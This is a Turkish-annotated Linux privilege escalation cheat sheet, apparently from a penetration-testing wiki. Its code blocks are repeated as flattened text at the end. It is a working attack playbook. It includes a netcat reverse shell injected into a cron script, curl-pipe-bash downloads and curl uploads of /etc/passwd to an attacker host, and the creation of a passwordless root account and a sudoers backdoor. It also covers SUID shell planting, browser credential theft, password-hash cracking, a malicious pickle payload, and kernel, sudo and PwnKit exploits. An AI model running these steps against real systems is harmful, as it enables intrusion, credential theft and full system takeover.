Linux Privilege Escalation

Shell Upgrade

# Python varsa
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Python yoksa
script /dev/null -qc /bin/bash

# Sonrasında
CTRL + Z

stty size # Buradaki değeri altta giriyoruz
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset;

Kullanıcı ve Gruplar

id # Aktif kullanıcı ve grup
env # Ortam Değişkenleri
history # Kullanıcının komut geçmişi
getent group sudo # Gruptaki kullanıcılar
lastlog # Kullanıcının son girişleri
w # Giriş yapmış kullanıcılar

cat /etc/passwd # Tüm kullanıcılar
cat /etc/group # Gruplar

realm list # Domain bilgisi
klist # Kerberos biletleri

Sistem Bilgileri

hostname # Hostname
uname -a # Kernel Versiyon
cat /etc/os-release # İşletim sistemi
cat /etc/issue # Login ekranındaki sistem bilgileri
cat /etc/shells # Bütün sheller
cat /etc/fstab # Mount edilmiş diskler

dpkg -l # Yüklü Uygulamalar
echo $PATH # Path Değişkeni
mount # Mount edilmiş dizin
lsblk # Diskler
lsmod # Kernel Modülleri
/sbin/modinfo libata # Modülün detayları
ps aux # Bütün processler
pspy64 # Process dinleme
timeout 20 ./pspy64 # 20 saniye çalıştır

grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama
find / -name flag.txt 2>/dev/null # Dosya Arama
ls /tmp # Geçici dizin
ls /dev/shm # Geçici dizin

Ağ Bilgileri

# Ağ Arayüzleri
ip a
ifconfig a 
arp -a

# Açık Portlar
netstat -punta
ss -tulpn

# Yönlendirme Tablosu
route
cat /etc/networks
ip route

# Firewall Ayarları
cat /etc/iptables/rules.v4

# Localde Gelen Parolalar
sudo tcpdump -i lo -A | grep "pass"

cat /etc/hosts # Hosts dosyası
cat /etc/resolv.conf # DNS dosyası

Dosya Transferi

# Http Download
python3 -m http.server 80
wget 192.168.1.2/linpeas.sh -O /tmp/linpeas.sh
wget 192.168.1.2/linpeas.sh -O /dev/shm/linpeas.sh
curl -L  192.168.1.2/linpeas.sh -o /tmp/linpeas.sh
curl -L 192.168.1.2/linpeas.sh | bash

# Base64 Download Upload
cat id_rsa |base64 -w 0;echo
echo -n 'BASE64' | base64 -d > id_rsa

# Netcat Download Upload
nc -lvnp 1234 > file.txt
nc -q 0 192.168.1.3 1234 < file.txt

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
python3 -m uploadserver 443 --server-certificate ~/server.pem
curl -X POST https://192.168.1.2/upload -F 'files=@/etc/passwd' --insecure

Önemli Dizinler

python2.7 laZagne.py all
python3 laZagne.py browsers
ls -l .mozilla/firefox/ | grep default 
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
python3.9 firefox_decrypt.py

# Configs
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done


# Config Files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null


find / -type f -iname "*config*" 

# Databases
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

# Notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# Scripts
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done

# Private Keys
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

# Public Keys
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"

# Bash History
tail -n5 /home/*/.bash*

# Documents
for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

# Log Files
cat /var/log/messages
cat /var/log/syslog
cat /var/log/auth.log
cat /var/log/secure
cat /var/log/boot.log
cat /var/log/dmesg
cat /var/log/kern.log
cat /var/log/faillog
cat /var/log/cron
cat /var/log/mail.log
cat /var/log/httpd
cat /var/log/mysqld.log
cd /var/spool/mail # Mail dosyaları

cat /proc/self/environ # Env değişkenleri
cat /proc/self/cmdline # Servisin komutu


# Log Search
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

# Kerberos Tickets
find / -name *keytab* -ls 2>/dev/null

# All Domain Credentials
./linikatz.sh

CronJobs

cat /etc/crontab
ls -lah /etc/cron* # Cronjob Listesi
cat /var/spool/cron/crontabs/root # Root Crontab
crontab -l # Kullanıcının Cronjob Listesi
sudo crontab -l # Root Cronjob Listesi
grep "CRON" /var/log/syslog # Sistem Loglarında Cronjob Arama
./pspy64 -pf -i 1000 # Processleri dinler

# Bütün Cronjoblar
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

# Reverse Shell Exploit
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh

# Root Shell Exploit
echo -e '#!/bin/bash\ncp /bin/bash /tmp/bash; chmod +s /tmp/bash' > backup.sh
/tmp/bash -ip

# Sudo Yetkisi ile Exploit
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh

World Writable Dosyalar

find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null

# Eğer /etc/passwd var ise root kullanıcı ekleyebiliriz
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

# Veya Parolasız
echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd

# Eğer shadow yazılabilir ise
mkpasswd -m yescrypt password
nano /etc/shadow

# Eski parolalar bu dosyada
cat /etc/security/opasswd


unshadow passwd shadow > unshadowed.hashes
hashcat -m 1800 -a 0 unshadowed.hashes /usr/share/rockyou.txt

SUID Binary

find / -user root -perm -4000 2>/dev/null
find / -user root -perm -6000 2>/dev/null

# Aşağıdaki Dosyalar Normal
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount

# Veya SUID ile işaretlenmiş bir dosya bizim değiştirebildiğimiz bir dosyayı kullanıyorsa
ls -la backup.sh # SUID Olan Dosya
ls -la backup.config # SUID Olan Dosyanın Çağırdığı Dosya

cp /bin/bash > backup.config
./backup.sh

SUDO

Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.

sudo -l

# NOPASSWD:ALL ROOT olan bir sh dosyası varsa shell alabiliriz
sudo /usr/bin/backup.sh -c /bin/bash

Binary Capabilities

GTFOBins: https://gtfobins.github.io/

/usr/sbin/getcap -r / 2>/dev/null

# Bunlar gereksiz
#/usr/bin/ping = cap_net_raw+ep
#/usr/bin/mtr-packet = cap_net_raw+ep

Wildcard Abuse

Eğer bir cronjob'da * karakteri varsa aşağıdaki exploit uygulanabilir.

echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip

Yetkili Gruplar

id

# lxd Grup
lxc image import alpine.tar.gz --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/bash

# Docker Grup
docker image ls
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash

# Disk Grup

# Adm Grup
cd /var/log

Screen Privilege Esc

wget https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/refs/heads/main/exploit.sh
bash exploit.sh

Logrotten

# Crate veya compress varsa exploit çalışır
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

wget https://raw.githubusercontent.com/whotwagner/logrotten/refs/heads/master/logrotten.c
gcc logrotten.c -o logrotten -static
./logrotten -p ./reverse /tmp/tmp.log

Shared Object Hijacking

ldd payroll
readelf -d payroll  | grep PATH
gcc rev.c -fPIC -shared -o /development/libshared.so

Python Module Permission

import psutil
available_memory = psutil.virtual_memory()

grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/*
ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
vim /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
os.system('id')

Automated

# Local
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80

# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check

chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check

./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt

Firefox Creds

Decrypter: https://github.com/unode/firefox_decrypt

cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db
cat /root/.mozilla/firefox/x.default-esr/logins.json

Kernel Exploit

cat /etc/issue
cat /etc/lsb-release
uname -r

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80

wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995

Sudo < 1.9.5p2

CVE-2021-3156: https://github.com/worawit/CVE-2021-3156

# Eğer zafiyetli ise sudoedit: /: not a regular file segfault hatası alırız
sudoedit -s /

sudo --version
sudo -V

python3 sudo_lpe.py

Dirty Pipe

Checker: https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

DirtyPipe: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

uname -r # Hedef
dpipe.sh 5.10.0 # Local

gcc exploit-1.c -o dpipe1 -static
gcc exploit-2.c -o dpipe2 -static

./dpipe1
./dpipe2 /usr/bin/su

Screen 4.5.0

Exploit: https://github.com/YasserREED/screen-v4.5.0-priv-escalate

Pwnkit

wget https://github.com/ly4k/PwnKit/raw/refs/heads/main/PwnKit
./PwnKit

Pickle Priv Esc

import torch
import os

class Payload:
    def __reduce__(self):
        return (os.system, ("whoami",))

evil = Payload()
torch.save(evil, 'evil.pth')

APT-GET CronJob Priv Esc (/etc/apt/apt.conf.d)

cd /etc/apt/apt.conf.d
echo 'apt::Update::Pre-Invoke {"revshell"};' > shell

PreviousAV Evasion NextLinux Persistence

Last updated 2 months ago

Was this helpful?

# Python varsa python3 -c 'import pty; pty.spawn("/bin/bash")' python2 -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/bash")' # Python yoksa script /dev/null -qc /bin/bash # Sonrasında CTRL + Z stty size # Buradaki değeri altta giriyoruz stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=xterm; stty rows 181 columns 42; reset;

id # Aktif kullanıcı ve grup env # Ortam Değişkenleri history # Kullanıcının komut geçmişi getent group sudo # Gruptaki kullanıcılar lastlog # Kullanıcının son girişleri w # Giriş yapmış kullanıcılar cat /etc/passwd # Tüm kullanıcılar cat /etc/group # Gruplar realm list # Domain bilgisi klist # Kerberos biletleri

hostname # Hostname uname -a # Kernel Versiyon cat /etc/os-release # İşletim sistemi cat /etc/issue # Login ekranındaki sistem bilgileri cat /etc/shells # Bütün sheller cat /etc/fstab # Mount edilmiş diskler dpkg -l # Yüklü Uygulamalar echo $PATH # Path Değişkeni mount # Mount edilmiş dizin lsblk # Diskler lsmod # Kernel Modülleri /sbin/modinfo libata # Modülün detayları ps aux # Bütün processler pspy64 # Process dinleme timeout 20 ./pspy64 # 20 saniye çalıştır grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama find / -name flag.txt 2>/dev/null # Dosya Arama ls /tmp # Geçici dizin ls /dev/shm # Geçici dizin

# Ağ Arayüzleri ip a ifconfig a arp -a # Açık Portlar netstat -punta ss -tulpn # Yönlendirme Tablosu route cat /etc/networks ip route # Firewall Ayarları cat /etc/iptables/rules.v4 # Localde Gelen Parolalar sudo tcpdump -i lo -A | grep "pass" cat /etc/hosts # Hosts dosyası cat /etc/resolv.conf # DNS dosyası

# Http Download python3 -m http.server 80 wget 192.168.1.2/linpeas.sh -O /tmp/linpeas.sh wget 192.168.1.2/linpeas.sh -O /dev/shm/linpeas.sh curl -L 192.168.1.2/linpeas.sh -o /tmp/linpeas.sh curl -L 192.168.1.2/linpeas.sh | bash # Base64 Download Upload cat id_rsa |base64 -w 0;echo echo -n 'BASE64' | base64 -d > id_rsa # Netcat Download Upload nc -lvnp 1234 > file.txt nc -q 0 192.168.1.3 1234 < file.txt openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' python3 -m uploadserver 443 --server-certificate ~/server.pem curl -X POST https://192.168.1.2/upload -F 'files=@/etc/passwd' --insecure

python2.7 laZagne.py all python3 laZagne.py browsers ls -l .mozilla/firefox/ | grep default cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . python3.9 firefox_decrypt.py # Configs for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done # Config Files for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null find / -type f -iname "*config*" # Databases for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done # Notes find /home/* -type f -name "*.txt" -o ! -name "*.*" # Scripts for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done # Private Keys grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" # Public Keys grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" # Bash History tail -n5 /home/*/.bash* # Documents for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done # Log Files cat /var/log/messages cat /var/log/syslog cat /var/log/auth.log cat /var/log/secure cat /var/log/boot.log cat /var/log/dmesg cat /var/log/kern.log cat /var/log/faillog cat /var/log/cron cat /var/log/mail.log cat /var/log/httpd cat /var/log/mysqld.log cd /var/spool/mail # Mail dosyaları cat /proc/self/environ # Env değişkenleri cat /proc/self/cmdline # Servisin komutu # Log Search for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done # Kerberos Tickets find / -name *keytab* -ls 2>/dev/null # All Domain Credentials ./linikatz.sh

cat /etc/crontab ls -lah /etc/cron* # Cronjob Listesi cat /var/spool/cron/crontabs/root # Root Crontab crontab -l # Kullanıcının Cronjob Listesi sudo crontab -l # Root Cronjob Listesi grep "CRON" /var/log/syslog # Sistem Loglarında Cronjob Arama ./pspy64 -pf -i 1000 # Processleri dinler # Bütün Cronjoblar cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#" # Reverse Shell Exploit ls -la /home/john/backup.sh echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh # Root Shell Exploit echo -e '#!/bin/bash\ncp /bin/bash /tmp/bash; chmod +s /tmp/bash' > backup.sh /tmp/bash -ip # Sudo Yetkisi ile Exploit printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh

find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null # Eğer /etc/passwd var ise root kullanıcı ekleyebiliriz openssl passwd password echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd su root2 # Veya Parolasız echo "root2::0:0:root:/root:/bin/bash" >> /etc/passwd # Eğer shadow yazılabilir ise mkpasswd -m yescrypt password nano /etc/shadow # Eski parolalar bu dosyada cat /etc/security/opasswd unshadow passwd shadow > unshadowed.hashes hashcat -m 1800 -a 0 unshadowed.hashes /usr/share/rockyou.txt

find / -user root -perm -4000 2>/dev/null find / -user root -perm -6000 2>/dev/null # Aşağıdaki Dosyalar Normal /usr/bin/chfn /usr/bin/chsh /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /bin/su /bin/mount /bin/umount # Veya SUID ile işaretlenmiş bir dosya bizim değiştirebildiğimiz bir dosyayı kullanıyorsa ls -la backup.sh # SUID Olan Dosya ls -la backup.config # SUID Olan Dosyanın Çağırdığı Dosya cp /bin/bash > backup.config ./backup.sh

id # lxd Grup lxc image import alpine.tar.gz --alias alpine lxc init alpine r00t -c security.privileged=true lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true lxc start r00t lxc exec r00t /bin/bash # Docker Grup docker image ls docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash # Disk Grup # Adm Grup cd /var/log

# Crate veya compress varsa exploit çalışır grep "create\|compress" /etc/logrotate.conf | grep -v "#" wget https://raw.githubusercontent.com/whotwagner/logrotten/refs/heads/master/logrotten.c gcc logrotten.c -o logrotten -static ./logrotten -p ./reverse /tmp/tmp.log

import psutil available_memory = psutil.virtual_memory() grep -r "def virtual_memory" /usr/local/lib/python3.8/dist-packages/psutil/* ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py vim /usr/local/lib/python3.8/dist-packages/psutil/__init__.py os.system('id')

# Local cp /usr/bin/unix-privesc-check . cp /usr/share/peass/linpeas . wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh python -m http.server 80 # Target cd /tmp wget http://192.168.1.3/LinEnum.sh wget http://192.168.1.3/linpeas wget http://192.168.1.3/unix-privesc-check chmod +x LinEnum.sh chmod +x linpeas chmod +x unix-privesc-check ./LinEnum.sh ./linpeas ./unix-privesc-check standard > output.txt

cat /root/.mozilla/firefox/x.default-esr/logins.json cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite cat /root/.mozilla/firefox/x.default-esr/key4.db cat /root/.mozilla/firefox/x.default-esr/logins.json

cat /etc/issue cat /etc/lsb-release uname -r searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8" python -m http.server 80 wget http://192.168.1.3/cve-2017-16995.c gcc cve-2017-16995.c -o cve-2017-16995 ./cve-2017-16995